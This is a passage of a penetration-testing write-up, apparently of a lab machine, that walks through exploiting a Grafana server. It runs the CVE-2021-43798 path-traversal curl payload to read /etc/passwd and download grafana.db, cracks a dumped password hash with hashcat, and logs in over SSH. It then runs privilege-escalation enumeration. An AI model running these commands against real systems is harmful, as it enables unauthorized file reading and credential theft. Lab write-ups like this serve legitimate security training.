https://substackcdn.com/image/fetch/$s_!AAS5!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5af7dabb-be05-4235-a8da-41d951ef60c0_1397x915.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>Seems good! So we don&#8217;t actually need credential for it.</p><ol start="4"><li><p><em>Internal Enumeration with CVE-2021-43798</em></p></li></ol><p>Let&#8217;s try it!</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ curl -i --path-as-is "http://10.129.234.47:3000/public/plugins/alertlist/../../../../../../../../../../../../../../../../../../../etc/passwd"
HTTP/1.1 200 OK
Accept-Ranges: bytes
. . .[SNIP]. . .
X-Frame-Options: deny
X-Xss-Protection: 1; mode=block
Date: Tue, 07 Apr 2026 10:47:01 GMT

root:x:0:0:root:/root:/bin/ash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/mail:/sbin/nologin
news:x:9:13:news:/usr/lib/news:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
man:x:13:15:man:/usr/man:/sbin/nologin
postmaster:x:14:12:postmaster:/var/mail:/sbin/nologin
cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
ftp:x:21:21::/var/lib/ftp:/sbin/nologin
sshd:x:22:22:sshd:/dev/null:/sbin/nologin
at:x:25:25:at:/var/spool/cron/atjobs:/sbin/nologin
squid:x:31:31:Squid:/var/cache/squid:/sbin/nologin
xfs:x:33:33:X Font Server:/etc/X11/fs:/sbin/nologin
games:x:35:35:games:/usr/games:/sbin/nologin
cyrus:x:85:12::/usr/cyrus:/sbin/nologin
vpopmail:x:89:89::/var/vpopmail:/sbin/nologin
ntp:x:123:123:NTP:/var/empty:/sbin/nologin
smmsp:x:209:209:smmsp:/var/spool/mqueue:/sbin/nologin
guest:x:405:100:guest:/dev/null:/sbin/nologin
nobody:x:65534:65534:nobody:/:/sbin/nologin
grafana:x:472:0:Linux User,,,:/home/grafana:/sbin/nologin</code></pre></div><p>Wow, it works!</p><p>Now we can fetch more things like potential:</p><ul><li><p>Grafana Databases</p></li><li><p>Users SSH RSA</p></li></ul><p>And many more.</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo curl --path-as-is "http://10.129.234.47:3000/public/plugins/alertlist/../../../../../../../../../../../../../../../../../../../var/lib/grafana/grafana.db" -o grafana.db 
  % Total    % Received % Xferd  Average Speed  Time    Time    Time   Current
                                 Dload  Upload  Total   Spent   Left   Speed
100 584.0k 100 584.0k   0      0 136.9k      0   00:04   00:04         115.6k
                                                                                                                                                                                                   
&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ file grafana.db                                                                                                                                                              
grafana.db: SQLite 3.x database, last written using SQLite version 3035004, file counter 366, database pages 146, cookie 0x109, schema 4, UTF-8, version-valid-for 366</code></pre></div><p>Then I found the Grafana database, which when dumped we got the Grafana hashes:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo sqlite3 grafana.db .dump                                                                                                                                                   
PRAGMA foreign_keys=OFF;
BEGIN TRANSACTION;
CREATE TABLE `migration_log` (
`id` INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL
, `migration_id` TEXT NOT NULL

. . .[SNIP]. . .

, `theme` TEXT NULL
, `created` DATETIME NOT NULL
, `updated` DATETIME NOT NULL
, `help_flags1` INTEGER NOT NULL DEFAULT 0, `last_seen_at` DATETIME NULL, `is_disabled` INTEGER NOT NULL DEFAULT 0);
INSERT INTO user VALUES(1,0,'admin','admin@localhost','','7a919e4bbe95cf5104edf354ee2e6234efac1ca1f81426844a24c4df6131322cf3723c92164b6172e9e73faf7a4c2072f8f8','YObSoLj55S','hLLY6QQ4Y6','',1,1,0,'','2022-01-23 12:48:04','2022-01-23 12:48:50',0,'2022-01-23 12:48:50',0);
INSERT INTO user VALUES(2,0,'boris','boris@data.vl','boris','dc6becccbb57d34daf4a4e391d2015d3350c60df3608e9e99b5291e47f3e5cd39d156be220745be3cbe49353e35f53b51da8','LCBhdtJWjl','mYl941ma8w','',1,0,0,'','2022-01-23 12:49:11','2022-01-23 12:49:11',0,'2012-01-23 12:49:11',0);
CREATE TABLE `temp_user` (
`id` INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL
, `org_id` INTEGER NOT NULL
, `version` INTEGER NOT NULL

. . .[SNIP]. . .</code></pre></div><p>Which I found 2 hashes.</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">7a919e4bbe95cf5104edf354ee2e6234efac1ca1f81426844a24c4df6131322cf3723c92164b6172e9e73faf7a4c2072f8f8,YObSoLj55S
dc6becccbb57d34daf4a4e391d2015d3350c60df3608e9e99b5291e47f3e5cd39d156be220745be3cbe49353e35f53b51da8,LCBhdtJWjl</code></pre></div><p>Which from it yes Grafana hash is having a salt, btw from here we also got a domain of:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">data.vl</code></pre></div><p>Let&#8217;s crack it.</p><ol start="5"><li><p><em>Grafana Hash Password Recovery</em></p></li></ol><p>For making it crack-able with:</p><ul><li><p>Hashcat</p></li><li><p>John the Ripper</p></li></ul><p>And more, we need to change the format, I will use this tool called <a href="https://github.com/iamaldi/grafana2hashcat/blob/main/grafana2hashcat.py">grafana2hashcat.py from GitHub</a> repo.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!DoQx!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F15ed00c1-e04b-498b-97f9-0aa882e307f4_1482x838.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!DoQx!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F15ed00c1-e04b-498b-97f9-0aa882e307f4_1482x838.png 424w, https://substackcdn.com/image/fetch/$s_!DoQx!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F15ed00c1-e04b-498b-97f9-0aa882e307f4_1482x838.png 848w, https://substackcdn.com/image/fetch/$s_!DoQx!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F15ed00c1-e04b-498b-97f9-0aa882e307f4_1482x838.png 1272w, https://substackcdn.com/image/fetch/$s_!DoQx!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F15ed00c1-e04b-498b-97f9-0aa882e307f4_1482x838.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!DoQx!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F15ed00c1-e04b-498b-97f9-0aa882e307f4_1482x838.png" width="1456" height="823" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/15ed00c1-e04b-498b-97f9-0aa882e307f4_1482x838.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:823,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:226844,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/193450322?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F15ed00c1-e04b-498b-97f9-0aa882e307f4_1482x838.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!DoQx!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F15ed00c1-e04b-498b-97f9-0aa882e307f4_1482x838.png 424w, https://substackcdn.com/image/fetch/$s_!DoQx!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F15ed00c1-e04b-498b-97f9-0aa882e307f4_1482x838.png 848w, https://substackcdn.com/image/fetch/$s_!DoQx!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F15ed00c1-e04b-498b-97f9-0aa882e307f4_1482x838.png 1272w, https://substackcdn.com/image/fetch/$s_!DoQx!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F15ed00c1-e04b-498b-97f9-0aa882e307f4_1482x838.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>Singular file!</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo python3 grafana2hashcat.py sql.hash                 

[+] Grafana2Hashcat
[+] Reading Grafana hashes from:  sql.hash
[+] Done! Read 2 hashes in total.
[+] Converting hashes...
[+] Converting hashes complete.
[*] Outfile was not declared, printing output to stdout instead.

sha256:10000:WU9iU29MajU1Uw==:epGeS76Vz1EE7fNU7i5iNO+sHKH4FCaESiTE32ExMizzcjySFkthcunnP696TCBy+Pg=
sha256:10000:TENCaGR0SldqbA==:3GvszLtX002vSk45HSAV0zUMYN82COnpm1KR5H8+XNOdFWviIHRb48vkk1PjX1O1Hag=</code></pre></div><p>Nice, now we got our SHA256 which are ready for hashcat.</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ hashcat -m 10900 crack.hash /usr/share/wordlists/rockyou.txt --show
sha256:10000:TENCaGR0SldqbA==:3GvszLtX002vSk45HSAV0zUMYN82COnpm1KR5H8+XNOdFWviIHRb48vkk1PjX1O1Hag=:beautiful1</code></pre></div><p>Which only once cracked! So now we have a pair of:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">user: boris
passwd: beautiful1</code></pre></div><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo netexec ssh data.vl -u boris -p beautiful1
SSH         10.129.234.47   22     data.vl          [*] SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.7
SSH         10.129.234.47   22     data.vl          [+] boris:beautiful1 (Pwn3d!) Linux - Shell access!</code></pre></div><p>Which grant us Linux Shell!!!</p><ol start="6"><li><p><em>Linux BloodPengu</em></p></li></ol><p>With credential, let&#8217;s BloodPengu first!</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo bloodpengu-python 10.129.234.47 -u boris -p beautiful1 -d data.vl -o bpe/out.json 

         _  __        ___  __             _____                                
   ___ _| |/_/_______/ _ )/ /__  ___  ___/ / _ \___ ___  ___ ___ __  ___  __ __
  / _ `/&gt;  &lt;/ __/___/ _  / / _ \/ _ \/ _  / ___/ -_) _ \/ _ `/ // / / _ \/ // /
  \_, /_/|_|\__/   /____/_/\___/\___/\_,_/_/   \__/_//_/\_, /\_,_(_) .__/\_, / 
 /___/                                                 /___/      /_/   /___/  

                           v1.5.8 [SuSHi Rav3n]                          

  gxc-BloodPengu.py v1.5.8 | by &lt;@byt3n33dl3&gt;
  Data collector in Python for BloodPengu APM

  ----------------------------------------------------------------------

  [*]  Target  : 10.129.234.47:22
  [*]  User    : boris
  [*]  Auth    : password
  [*]  Domain  : data.vl
  [*]  Mode    : full collection
  [*]  Output  : bpe/out.json

  [*]  Connecting to 10.129.234.47:22...
  [+]  Connected in 2.72s  -  boris@10.129.234.47:22
  [+]  Remote  : Linux data 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux

  ----------------------------------------------------------------------

  [*]  Collecting users and groups...
  [+]  Users: 31  |  Groups: 55
  [*]  Collecting sudo rules...
  [HIGH    ]  sudo            NOPASSWD rule: (root) NOPASSWD: /snap/bin/docker exec *
  [+]  Sudo rules collected: 1
  [*]  Collecting SUID/SGID binaries...
  [CRITICAL]  suid            GTFOBins SUID binary: /bin/mount
  [CRITICAL]  suid            GTFOBins SUID binary: /bin/umount
  [CRITICAL]  suid            GTFOBins SUID binary: /usr/bin/at
  [CRITICAL]  suid            GTFOBins SUID binary: /snap/core18/2253/bin/mount
  [CRITICAL]  suid            GTFOBins SUID binary: /snap/core18/2253/bin/umount
. . .[SNIP]. . .
  [*]  Running SACSPengu analysis...
  [POTENTIAL]  sacspengu       Compiler/interpreter: python3 -&gt; /usr/bin/python3
  [POTENTIAL]  sacspengu       Compiler/interpreter: perl -&gt; /usr/bin/perl

. . .[SNIP]. . .
  [POTENTIAL]  kernel          AppArmor status: apparmor module is loaded.
  [HIGH    ]  kernel          Seccomp disabled for this process (Seccomp: 0)  |  all syscalls available
  [POTENTIAL]  kernel          PAM modules present: /lib/x86_64-linux-gnu/security/pam_nologin.so  |  check CVE-2025-6018/CVE-2025-6019 on openSUSE/SUSE
  [HIGH    ]  kernel          CVE-2025-21756  |  vsock module loaded: vmw_vsock_vmci_transport    32768  1
vsock                  40960  2 vmw_vsock_vmci_transport                                                                                                                                           
vmw_vmci               69632  2 vmw_balloon,vmw_vsock_vmci_transport  |  Attack of the Vsock - VM escape to host root on kernels 6.8/6.11/6.12                                                     
  [HIGH    ]  kernel          core_pattern pipes to handler: |/usr/share/apport/apport -p%p -s%s -c%c -d%d -P%P -u%u -g%g -- %E  |  crash a SUID binary to invoke handler as root
  [+]  Kernel: 5.4.0-1103-aws  |  CVE matches: 6  |  Total LPE findings: 16

  ----------------------------------------------------------------------

  [+]  Collection complete in 933.12s

  [CRITICAL ]  46
  [HIGH     ]  24
  [POTENTIAL]  9

  [~]  Total findings  :  79
  [~]  Graph nodes     :  353
  [~]  Graph edges     :  150
  [~]  Output file     :  bpe/out.json

  [+]  Import bpe/out.json into BloodPengu via Import JSON

  ----------------------------------------------------------------------

  gxc-BloodPengu.py v1.5.8 by &lt;@byt3n33dl3&gt; &lt;github.com/byt3n33dl3/gxc-BloodPengu.py&gt;</code></pre></div><p>From the Graph collector we know that we have Docker Containers inside, so now my BloodPengu-Python would specify module for it!</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo bloodpengu-python 10.129.234.47 -u boris -p beautiful1 -d data.vl -M brace -o bpe/out-brace.json 

         _  __        ___  __             _____                                
   ___ _| |/_/_______/ _ )/ /__  ___  ___/ / _ \___ ___  ___ ___ __  ___  __ __
  / _ `/&gt;  &lt;/ __/___/ _  / / _ \/ _ \/ _  / ___/ -_) _ \/ _ `/ // / / _ \/ // /
  \_, /_/|_|\__/   /____/_/\___/\___/\_,_/_/   \__/_//_/\_, /\_,_(_) .__/\_, / 
 /___/                                                 /___/      /_/   /___/  

                           v1.5.8 [SuSHi Rav3n]                          

  gxc-BloodPengu.py v1.5.8 | by &lt;@byt3n33dl3&gt;
  Data collector in Python for BloodPengu APM

  ----------------------------------------------------------------------

  [*]  Target  : 10.129.234.47:22
  [*]  User    : boris
  [*]  Auth    : password
  [*]  Domain  : data.vl
  [*]  Mode    : brace
  [*]  Output  : bpe/out-brace.json

  [*]  Connecting to 10.129.234.47:22...
  [+]  Connected in 2.72s  -  boris@10.129.234.47:22
  [+]  Remote  : Linux data 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux

  ----------------------------------------------------------------------

  [*]  Collecting users and groups...
  [+]  Users: 31  |  Groups: 55
  [*]  Collecting privileged group memberships...
  [+]  Groups: boris
  [+]  Container runtimes: none  |  Escape paths: 0  |  Inside container: no

  ----------------------------------------------------------------------

  [+]  Collection complete in 47.75s

  [CRITICAL ]  0
  [HIGH     ]  0
  [POTENTIAL]  0

  [~]  Total findings  :  0
  [~]  Graph nodes     :  87
  [~]  Graph edges     :  1
  [~]  Output file     :  bpe/out-brace.json

  [+]  Import bpe/out-brace.json into BloodPengu via Import JSON

  ----------------------------------------------------------------------

  gxc-BloodPengu.py v1.5.8 by &lt;@byt3n33dl3&gt; &lt;github.com/byt3n33dl3/gxc-BloodPengu.py&gt;</code></pre></div><p>Let&#8217;s see the Graphs:</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!PRZh!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbd7c471f-d879-46be-b93c-6df717a0cfc8_1590x965.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!PRZh!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbd7c471f-d879-46be-b93c-6df717a0cfc8_1590x965.png 424w, https://substackcdn.com/image/fetch/$s_!PRZh!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbd7c471f-d879-46be-b93c-6df717a0cfc8_1590x965.png 848w, https://substackcdn.com/image/fetch/$s_!PRZh!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbd7c471f-d879-46be-b93c-6df717a0cfc8_1590x965.png 1272w, https://substackcdn.com/image/fetch/$s_!PRZh!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbd7c471f-d879-46be-b93c-6df717a0cfc8_1590x965.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!PRZh!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbd7c471f-d879-46be-b93c-6df717a0cfc8_1590x965.png" width="1456" height="884" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/bd7c471f-d879-46be-b93c-6df717a0cfc8_1590x965.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:884,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:412235,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/193450322?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbd7c471f-d879-46be-b93c-6df717a0cfc8_1590x965.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!PRZh!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbd7c471f-d879-46be-b93c-6df717a0cfc8_1590x965.png 424w, https://substackcdn.com/image/fetch/$s_!PRZh!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbd7c471f-d879-46be-b93c-6df717a0cfc8_1590x965.png 848w, https://substackcdn.com/image/fetch/$s_!PRZh!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbd7c471f-d879-46be-b93c-6df717a0cfc8_1590x965.png 1272w, https://substackcdn.com/image/fetch/$s_!PRZh!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbd7c471f-d879-46be-b93c-6df717a0cfc8_1590x965.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>So we got one no-password access:</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!oc24!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F50f08533-e566-4b66-ba85-aaa6cd4f7af0_1590x965.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!oc24!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F50f08533-e566-4b66-ba85-aaa6cd4f7af0_1590x965.png 424w, https://substackcdn.com/image/fetch/$s_!oc24!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F50f08533-e566-4b66-ba85-aaa6cd4f7af0_1590x965.png 848w, https://substackcdn.com/image/fetch/$s_!oc24!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F50f08533-e566-4b66-ba85-aaa6cd4f7af0_1590x965.png 1272w, https://substackcdn.com/image/fetch/$s_!oc24!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F50f08533-e566-4b66-ba85-aaa6cd4f7af0_1590x965.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!oc24!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F50f08533-e566-4b66-ba85-aaa6cd4f7af0_1590x965.png" width="1590" height="965" 